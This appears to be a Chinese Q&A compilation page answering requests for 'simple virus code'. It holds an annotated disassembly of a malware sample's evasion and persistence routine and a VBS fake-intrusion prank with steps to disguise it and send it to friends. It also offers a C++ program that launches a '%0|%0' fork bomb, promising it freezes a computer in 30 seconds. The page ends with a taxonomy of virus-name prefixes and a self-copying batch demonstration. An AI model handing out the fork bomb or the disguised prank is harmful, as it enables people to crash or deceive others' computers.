本文目录一览:
- 1、exe病毒的代码是什么?
- 2、谁有简单的电脑病毒代码??
- 3、比较简单的C++病毒代码
- 4、关于电脑病毒的代号
- 5、什么木马病毒最简单?
exe病毒的代码是什么?
刚刚看到一个朋友发了一个ff.exe的病毒样本,简单分析了下,之一部分,主函数代码
004061D2 /$ 55 push ebp ; Main
004061D3 |. 8BEC mov ebp, esp
004061D5 |. 81EC 1C030000 sub esp, 31C
004061DB |. 56 push esi
004061DC |. E8 FCAEFFFF call 取当前计算机用户名
004061E1 |. E8 88AFFFFF call 检查沙箱 ; 看自己是不是在虚拟机或沙箱中运行
004061E6 |. 85C0 test eax, eax
004061E8 |. 0F85 2E010000 jnz 0040631C
004061EE |. E8 C3B1FFFF call 检查模块dbghelp.dll ; 检查自己是否被调试
004061F3 |. 84C0 test al, al
004061F5 |. 0F85 21010000 jnz 0040631C
004061FB |. FF15 B8304100 call dword ptr [kernel32.GetCurrentProc; [GetCurrentProcess
00406201 |. 8BF0 mov esi, eax
00406203 |. 56 push esi
00406204 |. E8 DDAFFFFF call 004011E6 ; 调用NativeAPI查询系统信息
00406209 |. 3C 01 cmp al, 1
0040620B |. 59 pop ecx
0040620C |. 75 08 jnz short 00406216
0040620E |. 6A 00 push 0 ; /ExitCode = 0
00406210 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
00406216 | 56 push esi ; /hObject
00406217 |. FF15 CC304100 call dword ptr [kernel32.CloseHandle] ; \CloseHandle
0040621D |. E8 63B1FFFF call 00401385 ; 反调试代码
00406222 |. 3C 01 cmp al, 1
00406224 |. 75 08 jnz short 0040622E
00406226 |. 6A 00 push 0 ; /ExitCode = 0
00406228 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
0040622E | E8 42140000 call GetAddress ; 动态获取大量API函数地址
00406233 |. 833D 98584100 00 cmp dword ptr [415898], 0
0040623A |. 74 05 je short 00406241
0040623C |. E8 2F360000 call 00409870 ; 调用大量批处理来执行dos命令
00406241 | 8365 F8 00 and dword ptr [ebp-8], 0
00406245 |. 8365 FC 00 and dword ptr [ebp-4], 0
00406249 |. 6A 02 push 2
0040624B |. C745 F0 34594100 mov dword ptr [ebp-10], 00415934 ; ASCII "lncmmmser"
00406252 |. C745 F4 46934000 mov dword ptr [ebp-C], 00409346
00406259 |. FF15 74AA4100 call dword ptr [41AA74] ; kernel32.SetErrorMode
0040625F |. BE 04010000 mov esi, 104
00406264 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
0040626A |. 56 push esi ; /BufSize = 104 (260.)
0040626B |. 50 push eax ; |PathBuffer
0040626C |. 6A 00 push 0 ; |/pModule = NULL
0040626E |. FF15 F4304100 call dword ptr [kernel32.GetModuleHandl; |\GetModuleHandleA
00406274 |. 50 push eax ; |hModule
00406275 |. FF15 F8304100 call dword ptr [kernel32.GetModuleFileN; \GetModuleFileNameA
0040627B |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406281 |. 56 push esi ; /DestSizeMax = 104 (260.)
00406282 |. 50 push eax ; |DestString
00406283 |. 68 0C594100 push 0041590C ; |SrcString = "%windir%\system"
00406288 |. FF15 BC304100 call dword ptr [kernel32.ExpandEnvironm; \ExpandEnvironmentStringsA
0040628E |. BE 1C594100 mov esi, 0041591C ; ASCII "serivcers.exe"
00406293 |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00406299 |. 56 push esi ; /%s = "serivcers.exe"
0040629A |. 50 push eax ; |%s
0040629B |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218] ; |
004062A1 |. 68 40624100 push 00416240 ; |format = "%s\%s"
004062A6 |. 50 push eax ; |s
004062A7 |. FF15 94314100 call dword ptr [msvcrt.sprintf] ; \sprintf
004062AD |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
004062B3 |. 56 push esi
004062B4 |. 50 push eax
004062B5 |. E8 7D3C0000 call CopySelfToSystem32 ; 复制自身到System32目录,并且替换Serivcers.exe
004062BA |. 83C4 18 add esp, 18
004062BD |. 85C0 test eax, eax
004062BF |. 74 35 je short 004062F6
004062C1 |. 8D85 E4FCFFFF lea eax, dword ptr [ebp-31C]
004062C7 |. 6A 01 push 1
004062C9 |. 50 push eax
004062CA |. 68 CB5C4100 push 00415CCB ; ASCII "systemxstuff"
004062CF |. 68 CC5B4100 push 00415BCC ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions"
004062D4 |. FF35 C85B4100 push dword ptr [415BC8]
004062DA |. E8 7A2E0000 call 00409159 ; 修改关键注册表项,关联病毒为explorer打开文件夹
004062DF |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
004062E5 |. 50 push eax
004062E6 |. E8 F8300000 call 注册系统服务
004062EB |. 83C4 18 add esp, 18
004062EE |. 6A 01 push 1 ; /ExitCode = 1
004062F0 |. FF15 FC304100 call dword ptr [kernel32.ExitProcess] ; \ExitProcess
004062F6 | 68 24624100 push 00416224 ; ASCII "Enabled:Microsoft Enabled"
004062FB |. E8 00ADFFFF call 00401000
00406300 |. 59 pop ecx
00406301 |. 8D45 F0 lea eax, dword ptr [ebp-10]
00406304 |. 50 push eax
00406305 |. FF15 8CAA4100 call dword ptr [41AA8C] ; advapi32.StartServiceCtrlDispatcherA
0040630B |. 85C0 test eax, eax
0040630D |. 75 0D jnz short 0040631C
0040630F |. 8D85 E8FDFFFF lea eax, dword ptr [ebp-218]
00406315 |. 50 push eax
00406316 |. E8 C8300000 call 注册系统服务
0040631B |. 59 pop ecx
0040631C | 33C0 xor eax, eax
0040631E |. 5E pop esi
0040631F |. C9 leave
00406320 \. C2 1000 retn 10
谁有简单的电脑病毒代码??
新建一个文本文档,输入以下内容:msgbox"内容1"+chr(13)+"内容2"+chr(13)+"内容3",1,"标题"
格式和符号必须正确,内容1、内容2、内容3、标题可以随意更改,比如:msgbox"您的电脑被黑客入侵"+chr(13)+"请立刻发三遍我是猪到朋友圈"+chr(13)+"否则您的电脑显卡将起火",1,"黑客入侵警告"
之后保存,重命名,把后缀txt改为vbs,新建一个文件夹,点右键选择属性→自定义→更改图标,把它伪装成一个软件(我的是winXP系统,操作可能不一样),把刚才的文件放进去
最后发送给你的朋友,让他打开,他在电脑上就会出现一个这样的提示:
×
黑客入侵警告
您的电脑被黑客入侵
请立刻发三遍我是猪的朋友圈
否则您的电脑显卡将起火
确定
比较简单的C++病毒代码
/*亲自验证,不到30秒电脑卡死!运行后做好关机准备*/
/*留下您的赞再拿走,谢谢*/
运行效果如图
/*源代码:*/
//////////////////////////////////////////////////
#include Windows.h
#include iostream
#include fstream
using namespace std;
int main()
{
char a[9] = "abc.bat";
ofstream file_out(a);
file_out"%0|%0";
file_out.close();
system( a );
return 0;
}
关于电脑病毒的代号
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过 *** 或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞 *** 的特性。比如冲击波(阻塞 *** ),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒
木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过 *** 或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如 *** 消息尾巴木马 Trojan. *** 3344 ,还有大家可能遇见比较多的针对 *** 游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如: *** 枭雄(Hack.Nether.Client)等。
4、脚本病毒
脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦 ^_^。脚本病毒还会有如下前缀:VBS、 *** (表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。
6、后门病毒
后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过 *** 传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。
7、病毒种植程序病毒
这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
10.捆绑机病毒
捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如 *** 、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑 *** (Binder. *** Pass. *** Bin)、系统杀手(Binder.killsys)等
什么木马病毒最简单?
我写的这个最简单: (不信你试试)
0。新建一个文本文件
1。把下面“=================”中间的代码复制,
2。保存到自己电脑上
3。改名称为 “病毒.bat"
4。双击运行,按提示操作
5。这个程序没有破坏力(但是可以演示病毒的扩散)放心运行
备注:这是windows版本的,如果要linux /unix 的 email联系
其它,如果要学习编程什么的;很乐意跟你交流。我擅长c,javascript,
python 正在熟悉使用linux shell,awk,perl还有ruby。目前开发工作中用到c# 还有c++;
===================
@echo off
set dir="d:\病毒\"
if exist %dir% rd %dir% /q/s
set cdir=%cd%
set soucefile=%cd%\%0
mkdir %dir%
cls
echo 看一下D盘下面
echo -
echo 是不是有一个叫做‘病毒’的文件夹
echo -
echo 接下去要做的就是‘病毒’的扩散
echo -
echo 在这里 我不扩散到别的地方,只在“病毒”这个实验目录下进行感染扩散!
echo -
cd %cdir%
pause
for /L %%a in (1 1 100) do (
@mkdir %dir%\%%a
@copy %0 %dir%\%%a\%%a-病毒副本.bat
@cls
)
cls
echo -
echo 现在
echo -
echo 可以在病毒目录下发现100个子文件夹,
echo -
echo 每个文件夹下都有病毒文件的副本!
echo -
echo 恭喜你^-^ 被感染了!!
echo -
echo 不过没事,没有做什么对不起你的事情
echo -
echo 当然,
echo -
echo 如果在这里,我把你的c:\盘下的文件感染了,我想你会哭的
echo -
echo 接下去,产生的这些“病毒”的副本,将被删除,所以不用担心;没干别的坏事情!
echo -
echo 这就是一个最简单的病毒,希望能帮助你理解--什么是病毒
echo -
pause
rd %dir% /Q/S
=================